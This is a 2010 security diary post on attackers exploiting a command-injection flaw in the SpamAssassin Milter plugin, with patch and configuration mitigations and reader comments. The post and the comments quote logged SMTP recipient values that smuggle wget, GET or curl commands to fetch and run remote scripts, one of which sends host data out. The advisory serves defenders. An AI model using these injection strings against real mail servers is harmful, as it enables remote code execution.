Spamassassin Milter Plugin Remote Root Attack

Published: 2010-03-15
Last Updated: 2011-01-30 04:34:25 UTC
by Adrien de Beaupre (Version: 2)
4 comment(s)

Observant reader Roy caught an interesting exploit attempt against his SMTP server. His review of the logs turned up this:

Messages rejected to recipient: root+:|wget
       hxxp://www.linux-echo.de/.x/p.txt;perl p.txt:   smtp.target.com[10.11.17.18] : User unknown in local recipient
       table; from=<blue@attacker.com> to=<root+:|wget
       hxxp://www.linux-echo.de/.x/p.txt : 1 Time(s)

Handler Bojan notes that it appears that the bad guys have started to actively exploit SpamAssassin's milter vulnerability that has been published last weekend (more details at http://archives.neohapsis.com/archives/fulldisclosure/2010-03/0139.html).

The perl script collects some information about the local host and tries to send it to 203.59.123.114 on port 80 -- this host appears to be unreachable at the moment though.

Update: SecurityFocus BID 38578

Mitigation: There is a preliminary patch available at the SpamAssassin Milter Plugin project site, bug #29136: SpamAssassin Milter Plugin Input Validation Flaw Lets Remote Users Execute Arbitrary Code: http://savannah.nongnu.org/bugs/index.php?29136

Alternatively, don't use the -x option when running this plugin, as well do not run it as root.

Cheers,
Adrien de Beaupré
Intru-shun.ca Inc.

 

4 comment(s)

Comments

On FreeBSD, a fix hasn't yet made it into ports. Is there any mitigation against this attack aside from disabling spamass-milter for the time being?
I'm using spamass-milter on CentOS 5.x (a.k.a. Red Hat Enterprise Linux). Fortunately, the RPM as distributed by Red Hat doesn't use the "-x" flag. *whew* Just check your /etc/sysconfig/spamass-milter EXTRA_FLAGS to see if you added it yourself.

To double-check I attempted the exploit described at the Full Disclosure link (above) and it didn't work.
I havve logged attempts to use curl as well.

rcpt to: root+:"|wget http://213.186.44.xxx/blue.php"

rcpt to: root+:"|wget http://61.100.185.xxx/busy-1.php"
rcpt to: root+:"|GET http://61.100.185.xxx/busy-2.php"
rcpt to: root+:"|curl http://61.100.185.xxx/busy-3.php"
@BillBixby: The preliminary patch linked to in the article applies nicely within the port. Just copy it to ${PORTSDIR}/mail/spamass-milter/files/patch-popen and force a rebuild and reinstall of spamass-milter. Tested here on a couple of MTAs (8R-p2 base Sendmail).

Diary Archives